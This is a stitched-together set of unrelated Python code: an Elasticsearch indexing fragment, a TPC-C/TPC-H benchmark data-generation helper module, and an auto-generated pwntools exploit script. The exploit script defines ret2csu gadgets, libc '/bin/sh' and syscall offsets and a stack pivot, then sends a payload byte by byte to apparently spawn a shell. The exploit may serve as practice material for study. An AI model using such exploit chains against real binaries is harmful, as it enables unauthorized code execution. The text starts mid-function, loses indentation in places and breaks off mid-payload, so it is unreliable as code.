            status = es.get(index=INDEX, doc_type='meta', id='indexing', ignore=[400, 404])
            if status['found'] and 'xmin' in status['_source']:
                last_xmin = status['_source']['xmin']
        if last_xmin is None:  # still!
            if 'last_xmin' in result:
                last_xmin = result['last_xmin']
            elif 'xmin' in result and result['xmin'] < xmin:
                # NOTE(review): assigning result['state'] to last_xmin looks
                # suspicious -- result['xmin'] seems intended here; confirm
                # against IndexerState.get_initial_state().
                last_xmin = result['state']
        result.update(
            xmin=xmin,
            last_xmin=last_xmin,
        )
    if len(invalidated) > SEARCH_MAX:  # Priority cycle already set up
        flush = True
    else:
        flush = False
        # NOTE(review): on a priority-cycle path (xmin != -1, invalidated
        # non-empty but <= SEARCH_MAX) last_xmin is never assigned and this
        # would raise UnboundLocalError -- confirm priority cycles always
        # exceed SEARCH_MAX.
        if last_xmin is None:
            # First ever cycle: index everything (optionally limited to types).
            result['types'] = types = request.json.get('types', None)
            invalidated = list(all_uuids(request.registry, types))
            flush = True
        else:
            # Collect uuids touched by transactions since the last snapshot.
            txns = session.query(TransactionRecord).filter(
                TransactionRecord.xid >= last_xmin,
            )
            invalidated = set(invalidated)  # not empty if API index request occurred
            updated = set()
            renamed = set()
            max_xid = 0
            txn_count = 0
            for txn in txns.all():
                txn_count += 1
                max_xid = max(max_xid, txn.xid)
                # Track the earliest transaction timestamp for lag reporting.
                if first_txn is None:
                    first_txn = txn.timestamp
                else:
                    first_txn = min(first_txn, txn.timestamp)
                renamed.update(txn.data.get('renamed', ()))
                updated.update(txn.data.get('updated', ()))
            if invalidated:  # reindex requested, treat like updated
                updated |= invalidated
            result['txn_count'] = txn_count
            if txn_count == 0 and len(invalidated) == 0:
                # Nothing changed since the last cycle; nothing to do.
                state.send_notices()
                return result
            if is_testing and is_testing_full:
                # Test hook: force a complete uuid sweep without the ES lookup.
                full_reindex = False
                related_set = set(all_uuids(request.registry))
            else:
                (related_set, full_reindex) = get_related_uuids(request, es, updated, renamed)
            if full_reindex:
                invalidated = related_set
                flush = True
            else:
                invalidated = related_set | updated
            result.update(
                max_xid=max_xid,
                renamed=renamed,
                updated=updated,
                referencing=len(related_set),
                invalidated=len(invalidated),
                txn_count=txn_count
            )
            if first_txn is not None:
                result['first_txn_timestamp'] = first_txn.isoformat()
            if invalidated and not dry_run:
                # Exporting a snapshot mints a new xid, so only do so when required.
                # Not yet possible to export a snapshot on a standby server:
                # http://www.postgresql.org/message-id/CAHGQGwEtJCeHUB6KzaiJ6ndvx6EFsidTGnuLwJ1itwVH0EJTOA@<EMAIL>
                if snapshot_id is None and not recovery:
                    snapshot_id = connection.execute('SELECT pg_export_snapshot();').scalar()
    indexing_update_infos = []
    if invalidated and not dry_run:
        if len(stage_for_followup) > 0:
            # Note: undones should be added before, because those uuids will (hopefully) be indexed in this cycle
            state.prep_for_followup(xmin, invalidated)
        result = state.start_cycle(invalidated, result)
        # Do the work...
        indexing_update_infos, errors, err_msg = indexer.serve_objects(
            request,
            invalidated,
            xmin,
            snapshot_id=snapshot_id,
            restart=restart,
        )
        if err_msg:
            log.warning('Could not start indexing: %s', err_msg)
        result = state.finish_cycle(result,errors)
        if errors:
            result['errors'] = errors
        if record:
            try:
                es.index(index=INDEX, doc_type='meta', body=result, id='indexing')
            except:
                # Oversized/unserializable error payloads can break the meta
                # write; retry without them, then re-attach scrubbed messages.
                error_messages = copy.deepcopy(result['errors'])
                del result['errors']
                es.index(index=INDEX, doc_type='meta', body=result, id='indexing')
                for item in error_messages:
                    if 'error_message' in item:
                        log.error('Indexing error for {}, error message: {}'.format(item['uuid'], item['error_message']))
                        item['error_message'] = "Error occured during indexing, check the logs"
                result['errors'] = error_messages
        es.indices.refresh(RESOURCES_INDEX)
        if flush:
            try:
                es.indices.flush_synced(index=RESOURCES_INDEX)  # Faster recovery on ES restart
            except ConflictError:
                pass
    if first_txn is not None:
        result['txn_lag'] = str(datetime.datetime.now(pytz.utc) - first_txn)
    state.send_notices()
    if indexing_update_infos:
        # Check for logging of intitial indexing info here,
        # opposed to in the indexer or just after serve_objects,
        # so a crash in logging does not interupt indexing complietion
        indexer.check_log_indexing_times(indexing_update_infos)
    return result
def get_current_xmin(request):
    """Return the lowest transaction id still in progress for a fresh snapshot.

    Uses a SERIALIZABLE, READ ONLY, DEFERRABLE transaction when possible;
    on a recovery (standby) server falls back to READ COMMITTED because
    SERIALIZABLE is unavailable there.
    """
    session = request.registry[DBSESSION]()
    connection = session.connection()
    recovery = request.json.get('recovery', False)
    # http://www.postgresql.org/docs/9.3/static/functions-info.html#FUNCTIONS-TXID-SNAPSHOT
    if recovery:
        isolation = "SET TRANSACTION ISOLATION LEVEL READ COMMITTED, READ ONLY;"
    else:
        # DEFERRABLE prevents query cancelling due to conflicts but requires
        # SERIALIZABLE mode, which is not available in recovery.
        isolation = "SET TRANSACTION ISOLATION LEVEL SERIALIZABLE, READ ONLY, DEFERRABLE;"
    query = connection.execute(
        isolation + "SELECT txid_snapshot_xmin(txid_current_snapshot());"
    )
    # Lowest xid that is still in progress.
    return query.scalar()
class Indexer(object):
    def __init__(self, registry):
        """Create an Indexer bound to the registry's ES client and storage.

        Queue-related attributes stay ``None`` unless this process is
        configured as an indexer (``indexer`` setting truthy), in which
        case ``_setup_queues`` fills them in.
        """
        self.es = registry[ELASTIC_SEARCH]
        self.esstorage = registry[STORAGE]
        self.index = registry.settings['snovault.elasticsearch.index']
        self.queue_server = None  # primary uuid queue served by this process
        self.queue_server_backup = None  # SimpleUuidServer kept as a fallback
        self.queue_worker = None  # worker handle when this process also consumes
        self.chunk_size = None  # filled by _setup_queues from queue options
        self.batch_size = None  # filled by _setup_queues from queue options
        self.worker_runs = []  # per-run worker info (populated elsewhere -- not shown here)
        if registry.settings.get('indexer'):
            self._setup_queues(registry)
def check_log_indexing_times(self, update_infos):
if self.indexer_initial_log and not os.path.exists(self.indexer_initial_log_path):
log.warning('Logging indexing data to %s', self.indexer_initial_log_path)
counter = 0
with open(self.indexer_initial_log_path, 'w', encoding='utf-8') as file_handler:
for update_info in update_infos:
str_update_info = json.dumps(update_info, ensure_ascii=False)
file_handler.write(str_update_info)
counter += 1
log.warning('Logged %d uuids. One per line' % counter)
    def _setup_queues(self, registry):
        '''Init helper - Setup server and worker queues'''
        self.index = registry.settings['snovault.elasticsearch.index']
        # Optional one-shot log of per-uuid indexing info
        # (consumed by check_log_indexing_times).
        self.indexer_initial_log = asbool(registry.settings.get('indexer_initial_log', False))
        self.indexer_initial_log_path = registry.settings.get('indexer_initial_log_path')
        try:
            # 0 (the fallback) presumably means "index all uuids" -- confirm
            # how serve_objects consumes this setting.
            self.indexer_short_uuids = int(registry.settings.get('indexer_short_uuids'))
        except Exception as ecp:
            log.warning('indexer_short_uuids could not be cast to int. Defaulting to all.')
            self.indexer_short_uuids = 0
        queue_type = registry.settings.get('queue_type', None)
        is_queue_server = asbool(registry.settings.get('queue_server'))
        is_queue_worker = asbool(registry.settings.get('queue_worker'))
        queue_options = self._get_queue_options(registry)
        self.chunk_size = queue_options['chunk_size']
        self.batch_size = queue_options['batch_size']
        if is_queue_server:
            # Always build the in-process SimpleUuidServer: it becomes either
            # the primary queue (default path) or a standby fallback in case
            # the external UuidQueue fails to initialize.
            cp_q_ops = queue_options.copy()
            cp_q_ops['batch_size'] = cp_q_ops['get_size']
            self.queue_server_backup = SimpleUuidServer(cp_q_ops)
            if (
                not queue_type or
                queue_type == DEFAULT_QUEUE or
                queue_type not in registry['available_queues']
            ):
                # Unset/unknown queue type: promote the simple server to primary.
                self.queue_type = DEFAULT_QUEUE
                self.queue_server = self.queue_server_backup
                self.queue_server_backup = None
            elif 'UuidQueue' in registry:
                try:
                    queue_options['uuid_len'] = 36  # canonical uuid string length
                    self.queue_server = registry['UuidQueue'](
                        queue_options['queue_name'],
                        queue_type,
                        queue_options,
                    )
                except Exception as exp:  # pylint: disable=broad-except
                    log.warning(repr(exp))
                    log.warning(
                        'Failed to initialize UuidQueue. Switching to backup.'
                    )
                    # NOTE(review): expected to promote the backup queue and set
                    # self.queue_type -- confirm _serve_object_switch_queue does so.
                    self._serve_object_switch_queue()
                else:
                    self.queue_type = queue_type
        else:
            log.error('No queue available for Indexer')
        if self.queue_server and is_queue_worker:
            # This process both serves the queue and consumes from it.
            self.queue_worker = self.queue_server.get_worker()
        # NOTE(review): self.queue_type is only assigned on the server paths; a
        # non-server process would raise AttributeError here -- confirm config.
        log.warning('Primary indexer queue type: %s', self.queue_type)
@staticmethod
def _get_queue_options(registry):
'''Init helper - Extract queue options from registry settings'''
queue_name = registry.settings.get('queue_name', 'indxQ')
queue_worker_processes = int(
registry.settings.get('queue_worker_processes', 1)
)
queue_worker_chunk_size = int(
registry.settings.get('queue_worker_chunk_size', 1024)
)
queue_worker_batch_size = int(
registry.settings.get('queue_worker_batch_size', 5000)
| |
# file: benchmarks/htap/lib/helpers.py
import math
import random
from contextlib import AbstractContextManager
from dateutil.parser import isoparse
from typing import Iterator, Optional
import io
from datetime import datetime
import multiprocessing
# OLTP constants
# see http://www.tpc.org/tpc_documents_current_versions/pdf/tpc-c_v5.11.0.pdf page 62
# and to check resulting sizes after ingest, use figure 1.2.1 on page 11
# WARNING: most of the counts like CUST_PER_DIST and NUM_ORDERS are scaled with
# DIST_PER_WARE which makes the resulting row counts higher!
DIST_PER_WARE = 10
CUST_PER_DIST = 3000
NUM_ORDERS = 3000
MAX_ITEMS = 100000
STOCKS = 100000
# see 3.3.2.11 in tpc-c spec.
FIRST_UNPROCESSED_O_ID = 2101
# OLAP constants
# see section 4.2.2.12, page 81 of http://www.tpc.org/tpc_documents_current_versions/pdf/tpc-h_v2.17.2.pdf
TPCH_DATE_RANGE = [isoparse('1992-01-01'), isoparse('1998-12-31')]
WANTED_RANGE = TPCH_DATE_RANGE[1] - TPCH_DATE_RANGE[0]
NUM_SUPPLIERS = 10000
NUM_NATIONS = 62
NUM_REGIONS = 5
# Character alphabets used by the OLTP/OLAP text generators below.
ALPHA_LOWER = list('abcdefghijklmnopqrstuvwxyz')
ALPHA_UPPER = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
NUM = list('0123456789')
ALPHA = ALPHA_LOWER + ALPHA_UPPER
ALPHA54 = ALPHA_LOWER + list('?@') + ALPHA_UPPER
ALPHANUM = ALPHA + NUM
ALPHANUM64 = ALPHA54 + NUM
# Syllables used to compose TPC-C customer last names (see OLTPText.lastname).
NAMES = ['BAR', 'OUGHT', 'ABLE', 'PRI', 'PRES', 'ESE', 'ANTI', 'CALLY', 'ATION', 'EING']
# yapf: disable
NATIONS = [
    # nation key, name, region key
    (48, 'Australia', 4), (49, 'Belgium', 5), (50, 'Cameroon', 1),
    (51, 'Denmark', 5), (52, 'Equador', 2), (53, 'France', 5),
    (54, 'Germany', 5), (55, 'Hungary', 5), (56, 'Italy', 5),
    (57, 'Japan', 3),
    (65, 'Kenya', 1), (66, 'Lithuania', 5), (67, 'Mexico', 2),
    (68, 'Netherlands', 5), (69, 'Oman', 1), (70, 'Portugal', 5),
    (71, 'Qatar', 1), (72, 'Rwanda', 1), (73, 'Serbia', 5),
    (74, 'Togo', 1), (75, 'United States', 2), (76, 'Vietnam', 3),
    (77, 'Singapore', 3), (78, 'Cambodia', 3), (79, 'Yemen', 1),
    (80, 'Zimbabwe', 1), (81, 'Argentina', 2), (82, 'Bolivia', 2),
    (83, 'Canada', 2), (84, 'Dominican Republic', 2), (85, 'Egypt', 1),
    (86, 'Finland', 5), (87, 'Ghana', 1), (88, 'Haiti', 2),
    (89, 'India', 3), (90, 'Jamaica', 4),
    ( 97, 'Kazakhstan', 3), ( 98, 'Luxemburg', 5), ( 99, 'Marocco', 1),
    (100, 'Norway', 5), (101, 'Poland', 5), (102, 'Peru', 2),
    (103, 'Nicaragua', 2), (104, 'Romania', 5), (105, 'South Africa', 1),
    (106, 'Thailand', 3), (107, 'United Kingdom', 5), (108, 'Venezuela', 2),
    (109, 'Liechtenstein', 5), (110, 'Austria', 5), (111, 'Laos', 3),
    (112, 'Zambia', 1), (113, 'Switzerland', 5), (114, 'China', 3),
    (115, 'Papua New Guinea', 4), (116, 'East Timor', 4), (117, 'Bulgaria', 5),
    (118, 'Brazil', 2), (119, 'Albania', 5), (120, 'Andorra', 5),
    (121, 'Belize', 2), (122, 'Botswana', 1),
]
# yapf: enable
REGIONS = [(1, 'Africa'), (2, 'America'), (3, 'Asia'), (4, 'Australia'), (5, 'Europe')]
# Word lists for TPC-H style pseudo-text generation (see OLAPText).
NOUNS = [
    'foxes', 'ideas', 'theodolites', 'pinto beans', 'instructions', 'dependencies', 'excuses',
    'platelets', 'asymptotes', 'courts', 'dolphins', 'multipliers', 'sauternes', 'warthogs',
    'frets', 'dinos', 'attainments', 'somas', 'Tiresias', 'patterns', 'forges', 'braids',
    'hockey players', 'frays', 'warhorses', 'dugouts', 'notornis', 'epitaphs', 'pearls',
    'tithes', 'waters', 'orbits', 'gifts', 'sheaves', 'depths', 'sentiments', 'decoys',
    'realms', 'pains', 'grouches', 'escapades'
]
VERBS = [
    'sleep', 'wake', 'are', 'cajole', 'haggle', 'nag', 'use', 'boost', 'affix', 'detect',
    'integrate', 'maintain', 'nod', 'was', 'lose', 'sublate', 'solve', 'thrash', 'promise',
    'engage', 'hinder', 'print', 'x-ray', 'breach', 'eat', 'grow', 'impress', 'mold', 'poach',
    'serve', 'run', 'dazzle', 'snooze', 'doze', 'unwind', 'kindle', 'play', 'hang', 'believe',
    'doubt'
]
ADJECTIVES = [
    'furious', 'sly', 'careful', 'blithe', 'quick', 'fluffy', 'slow', 'quiet', 'ruthless',
    'thin', 'close', 'dogged', 'daring', 'brave', 'stealthy', 'permanent', 'enticing', 'idle',
    'busy', 'regular', 'final', 'ironic', 'even', 'bold', 'silent'
]
ADVERBS = [
    'sometimes', 'always', 'never', 'furiously', 'slyly', 'carefully', 'blithely', 'quickly',
    'fluffily', 'slowly', 'quietly', 'ruthlessly', 'thinly', 'closely', 'doggedly', 'daringly',
    'bravely', 'stealthily', 'permanently', 'enticingly', 'idly', 'busily', 'regularly',
    'finally', 'ironically', 'evenly', 'boldly', 'silently'
]
PREPOSITIONS = [
    'about', 'above', 'according to', 'across', 'after', 'against', 'along', 'alongside of',
    'among', 'around', 'at', 'atop', 'before', 'behind', 'beneath', 'beside', 'besides',
    'between', 'beyond', 'by', 'despite', 'during', 'except', 'for', 'from', 'in place of',
    'inside', 'instead of', 'into', 'near', 'of', 'on', 'outside', 'over', 'past', 'since',
    'through', 'throughout', 'to', 'toward', 'under', 'until', 'up', 'upon', 'without', 'with',
    'within'
]
TERMINATORS = ['.', ';', ':', '?', '!', '--']
AUXILIARIES = [
    'do', 'may', 'might', 'shall', 'will', 'would', 'can', 'could', 'should', 'ought to',
    'must', 'will have to', 'shall have to', 'could have to', 'should have to', 'must have to',
    'need to', 'try to'
]
# Number of TPC-C warehouses per unit of TPC-H scale factor.
WAREHOUSES_SF_RATIO = 20
class Random:
    """Seeded wrapper around ``random.Random`` with TPC-C helpers.

    All draws go through a single ``random.Random`` instance so that a given
    seed reproduces the exact same data stream.
    """

    def __init__(self, seed):
        self.rng = random.Random(seed)
        # TPC-C 2.1.6.1: per-run NURand constants C, drawn from [0, A].
        # (Previously drawn with randint(0, A + 1); Python's randint is
        # inclusive, so that could yield the out-of-range value A + 1.)
        self.C_255 = self.rng.randint(0, 255)
        self.C_1023 = self.rng.randint(0, 1023)
        self.C_8191 = self.rng.randint(0, 8191)

    def nurand(self, A, x, y):
        """TPC-C NURand(A, x, y): non-uniform random value in [x, y].

        Raises ValueError for unsupported A (the spec defines only
        255, 1023 and 8191).
        """
        if A == 255:
            C = self.C_255
        elif A == 1023:
            C = self.C_1023
        elif A == 8191:
            C = self.C_8191
        else:
            raise ValueError(f'unsupported NURand constant A={A}')
        # Spec: (((random(0, A) | random(x, y)) + C) % (y - x + 1)) + x,
        # with random(a, b) inclusive on both ends.  random.Random.randint is
        # inclusive too, so no +1 adjustment is needed (the previous +1 pushed
        # draws one past each range).
        return (((self.rng.randint(0, A) | self.rng.randint(x, y)) + C) % (y - x + 1)) + x

    def decision(self, frac):
        """Return True with probability *frac*."""
        return self.rng.random() < frac

    def randint_inclusive(self, low, high):
        """Uniform integer in [low, high]."""
        return self.rng.randint(low, high)

    def sample(self):
        """Uniform float in [0, 1)."""
        return self.rng.random()

    def gaussian(self, mean, variance):
        # NOTE(review): random.gauss takes a standard deviation; callers pass
        # the second argument as 'variance', so sigma equals the given value.
        return self.rng.gauss(mean, variance)

    def shuffle(self, l):
        """Shuffle *l* in place."""
        self.rng.shuffle(l)

    def from_list(self, l, length=1):
        """Return *length* elements chosen with replacement from *l*."""
        return self.rng.choices(l, k=length)
class OLTPText:
    """TPC-C style random text helpers driven by a shared Random instance."""

    def __init__(self, random):
        self.random = random

    def lastname(self, num):
        """Compose a TPC-C customer last name from the digits of *num*."""
        hundreds = math.floor(num / 100)
        tens = math.floor(num / 10) % 10
        ones = num % 10
        return NAMES[hundreds] + NAMES[tens] + NAMES[ones]

    def _draw(self, alphabet, length, prefix):
        # Shared implementation for the *string helpers below: *length*
        # characters chosen with replacement from *alphabet*.
        return prefix + ''.join(self.random.from_list(alphabet, length))

    def string(self, length, prefix=''):
        return self._draw(ALPHA, length, prefix)

    def numstring(self, length, prefix=''):
        return self._draw(NUM, length, prefix)

    def alnumstring(self, length, prefix=''):
        return self._draw(ALPHANUM, length, prefix)

    def alnum64string(self, length, prefix=''):
        return self._draw(ALPHANUM64, length, prefix)

    def data(self, min_length, max_length):
        """Random alnum64 string with length in [min_length, max_length]."""
        length = self.random.randint_inclusive(min_length, max_length)
        return self.alnum64string(length)

    def data_original(self, min_length, max_length):
        """Like data(), but with the literal 'ORIGINAL' spliced in at a
        random position (TPC-C stock/item data rule)."""
        marker = 'ORIGINAL'
        length = self.random.randint_inclusive(min_length, max_length - len(marker))
        body = self.alnum64string(length)
        cut = self.random.randint_inclusive(0, length - len(marker))
        return '{}{}{}'.format(body[0:cut], marker, body[cut:length])

    def state(self):
        """Two random uppercase letters/digits, e.g. a fake US state code."""
        return self.alnumstring(2).upper()
class OLAPText:
    """TPC-H style pseudo-text generator driven by a shared Random instance."""

    def __init__(self, random):
        self.random = random

    def _pick(self, words):
        # Uniform element choice via randint_inclusive so the RNG stream is
        # identical to indexing with a random position.
        return words[self.random.randint_inclusive(0, len(words) - 1)]

    def random_noun(self):
        return self._pick(NOUNS)

    def random_verb(self):
        return self._pick(VERBS)

    def random_adjective(self):
        return self._pick(ADJECTIVES)

    def random_adverb(self):
        return self._pick(ADVERBS)

    def random_preposition(self):
        return self._pick(PREPOSITIONS)

    def random_terminator(self):
        return self._pick(TERMINATORS)

    def random_auxiliary(self):
        return self._pick(AUXILIARIES)

    def random_noun_phrase(self):
        """One of four noun-phrase shapes, each with probability ~1/4."""
        if self.random.decision(1 / 4):
            return self.random_noun()
        if self.random.decision(1 / 4):
            return f'{self.random_adjective()} {self.random_noun()}'
        if self.random.decision(1 / 4):
            return f'{self.random_adjective()}, {self.random_adjective()} {self.random_noun()}'
        return f'{self.random_adverb()} {self.random_adjective()} {self.random_noun()}'

    def random_verb_phrase(self):
        """One of four verb-phrase shapes, each with probability ~1/4."""
        if self.random.decision(1 / 4):
            return self.random_verb()
        if self.random.decision(1 / 4):
            return f'{self.random_auxiliary()} {self.random_verb()}'
        if self.random.decision(1 / 4):
            return f'{self.random_verb()} {self.random_adverb()}'
        return f'{self.random_auxiliary()} {self.random_verb()} {self.random_adverb()}'

    def random_prepositional_phrase(self):
        return f'{self.random_preposition()} the {self.random_noun_phrase()}'

    def random_sentence(self):
        """One of five sentence shapes, each with probability ~1/5.

        Spacing is intentional: the last two shapes attach the terminator
        directly to the preceding phrase.
        """
        if self.random.decision(1 / 5):
            return f'{self.random_verb_phrase()} {self.random_noun_phrase()} {self.random_terminator()}'
        if self.random.decision(1 / 5):
            return (
                f'{self.random_noun_phrase()} {self.random_verb_phrase()} '
                f'{self.random_prepositional_phrase()} {self.random_terminator()}'
            )
        if self.random.decision(1 / 5):
            return (
                f'{self.random_noun_phrase()} {self.random_verb_phrase()} '
                f'{self.random_noun_phrase()} {self.random_terminator()}'
            )
        if self.random.decision(1 / 5):
            return (
                f'{self.random_noun_phrase()} {self.random_prepositional_phrase()} '
                f'{self.random_verb_phrase()} {self.random_noun_phrase()}'
                f'{self.random_terminator()}'
            )
        return (
            f'{self.random_noun_phrase()} {self.random_prepositional_phrase()} '
            f'{self.random_verb_phrase()} {self.random_prepositional_phrase()}'
            f'{self.random_terminator()}'
        )

    def random_text(self, length):
        """Exactly *length* characters cut from 25 ':'-joined sentences."""
        text = ''
        for sentence_index in range(25):
            if sentence_index != 0:
                text += ':'
            text += self.random_sentence()
        start = self.random.randint_inclusive(0, len(text) - length)
        return text[start:start + length]

    def random_length_text(self, min_length, max_length):
        """random_text with a uniformly random length in [min, max]."""
        chosen = self.random.randint_inclusive(min_length, max_length)
        return self.random_text(chosen)

    def random_customer_text(self, min_length, max_length, action):
        """Customer comment of random total length containing
        'Customer' ... *action* with random filler around them."""
        total_length = self.random.randint_inclusive(min_length, max_length)
        l1 = self.random.randint_inclusive(0, total_length - 8 - len(action))
        l2 = self.random.randint_inclusive(0, total_length - l1 - 8 - len(action))
        l3 = total_length - l1 - l2 - 8 - len(action)
        return '{}Customer{}{}{}'.format(
            self.random_text(l1), self.random_text(l2), action, self.random_text(l3)
        )

    def random_phone_number(self, key):
        """Phone number 'CC-xxx-xxx-xxxx'; country code derived from *key*."""
        country = (key % 90) + 10
        local1 = self.random.randint_inclusive(100, 999)
        local2 = self.random.randint_inclusive(100, 999)
        local3 = self.random.randint_inclusive(1000, 9999)
        return '{}-{}-{}-{}'.format(country, local1, local2, local3)
class TimestampGenerator:
    """Produces increasing order timestamps paced so one warehouse's orders
    span the TPC-H date range, with ~5% gaussian jitter per step."""

    def __init__(self, start_date, random, scalar = 1.0):
        # use the start date as value directly so that we can easily use shared counters
        # as well by simply feeding in the right type
        self.current = start_date
        self.random = random
        orders_per_warehouse = NUM_ORDERS * DIST_PER_WARE
        date_range = TPCH_DATE_RANGE[1] - TPCH_DATE_RANGE[0]
        # Average timedelta per generated order; `scalar` stretches or
        # compresses the pacing.
        self.increment = (date_range / orders_per_warehouse) * scalar

    def next(self):
        """Advance by roughly one increment and return the new datetime."""
        # support both process-local counters as well as multiprocessing value proxies
        if isinstance(self.current, datetime):
            self.current += self.increment * self.random.gaussian(mean=1, variance=0.05)
            return self.current
        elif isinstance(self.current, multiprocessing.sharedctypes.Synchronized):
            # Shared float holding epoch seconds: update under its lock so
            # concurrent producers never interleave updates.
            # NOTE(review): this attribute lookup assumes
            # multiprocessing.sharedctypes is already imported (true once a
            # Value has been created in-process) -- confirm.
            with self.current.get_lock():
                self.current.value += self.increment.total_seconds() * self.random.gaussian(mean=1, variance=0.05)
                return datetime.fromtimestamp(self.current.value)
        else:
            raise ValueError("Unsupported datatype for TimestampGenerator")
# Taken from CPython 3.7 for compatibility with Python 3.6
class nullcontext(AbstractContextManager):
    """Backport of contextlib.nullcontext (CPython 3.7) for Python 3.6.

    A no-op context manager that simply hands back ``enter_result`` on
    entry, for code paths that only sometimes need a real manager::

        cm = optional_cm if condition else nullcontext()
        with cm:
            ...  # uses optional_cm only when condition is True
    """

    def __init__(self, enter_result=None):
        self.enter_result = enter_result

    def __enter__(self):
        return self.enter_result

    def __exit__(self, *exc_info):
        # Never suppresses exceptions.
        return None
# from https://hakibenita.com/fast-load-data-python-postgresql
class StringIteratorIO(io.TextIOBase):
def __init__(self, iter: Iterator[str]):
self._iter = iter
self._buff = ''
def readable(self) -> bool:
| |
#!/usr/bin/env python3
# Auto-generated pwntools exploit: replays a recorded interaction with ./target
# linked against libc-2.24.
from pwn import *
context.update(arch = 'amd64', os = 'linux', log_level = 'info')
target = ELF('./target', checksec=False)
libc_2_24_so = ELF('./libc-2.24.so', checksec=False)
# __libc_csu_init and its universal gadget addresses in the target binary
# (names suggest the classic ret2csu technique — TODO confirm).
__libc_csu_init = 0x401360
__libc_csu_init_call_target = 0x402e48
__libc_csu_init_gadget1 = 0x4013b6
__libc_csu_init_gadget2 = 0x4013a0
# Runtime-dependent values; the 0x0 entries are presumably placeholders filled
# in from leaks during the recorded session — verify against the generator.
canary = 0x0
got_leak_libc_fmt_str = 0x404660
libc_2_24_so_base = 0x0
# libc-2.24.so offsets: "/bin/sh" string plus pop-register and syscall gadgets.
libc_2_24_so_binsh = 0x161c19
libc_2_24_so_pop_rax_ret = 0x35fc8
libc_2_24_so_pop_rdi_ret = 0x1fc6a
libc_2_24_so_pop_rdx_ret = 0x1b92
libc_2_24_so_pop_rsi_ret = 0x1fc1a
libc_2_24_so_syscall = 0x26c7
# Target-binary addresses: writable destination for a stack pivot (leave; ret)
# and small local gadgets.
pivot_dest = 0x404860
target_base = 0x0
target_leave_ret = 0x40134f
target_pop_rbp_ret = 0x4011dd
target_pop_rdi_ret = 0x4013c3
if __name__ == '__main__':
proc = process(['./ld-2.24.so', './target'], env={'LD_PRELOAD': './libc-2.24.so'})
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# output state
proc.recvrepeat(0.1)
# input state (offset = 1)
proc.send(b'\x80')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xb4')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xff')
# input state (offset = 1)
proc.send(b'\xfe')
# input state (offset = 1)
proc.send(b'\x8b')
# input state (offset = 1)
proc.send(b'\x7d')
# input state (offset = 1)
proc.send(b'\xf4')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x02')
# input state (offset = 1)
proc.send(b'\x92')
# input state (offset = 1)
proc.send(b'\xcc')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x51')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x98')
# input state (offset = 1)
proc.send(b'\x94')
# input state (offset = 1)
proc.send(b'\x7c')
# input state (offset = 1)
proc.send(b'\xa8')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xda')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x02')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x03')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x03')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x03')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\xb6')
# input state (offset = 1)
proc.send(b'\x13')
# input state (offset = 1)
proc.send(b'\x40')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x41')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x01')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x60')
# input state (offset = 1)
proc.send(b'\x48')
# input state (offset = 1)
proc.send(b'\x40')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
proc.send(b'\x00')
# input state (offset = 1)
